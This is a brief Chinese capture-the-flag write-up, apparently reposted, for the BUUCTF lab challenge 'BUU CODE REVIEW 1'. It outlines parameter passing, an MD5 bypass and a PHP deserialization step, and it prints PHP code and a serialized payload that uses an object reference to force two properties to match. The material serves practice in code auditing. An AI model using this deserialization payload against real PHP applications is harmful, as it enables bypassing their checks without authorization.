BUU CODE REVIEW 1(代码审计)
Posted wrnan
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU CODE REVIEW 1(代码审计)相关的知识,希望对你有一定的参考价值。
0、打开靶机后,是php源码
1、第一层是GET,POST传参
2、第二层md5绕过
3、第三层是php反序列化
<?php
class BUU{
public $correct="";
public $input="";
}
$obj= new BUU;
$obj->input=&$obj->correct;
echo serialize($obj);
?>得到的字符串:
O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}4、在postman,走一下。
以上是关于BUU CODE REVIEW 1(代码审计)的主要内容,如果未能解决你的问题,请参考以下文章
BUU CODE REVIEW 1 1(反序列化+md5绕过)
BUU 302重定向php代码审计文件包含漏洞-[极客大挑战 2019]Secret File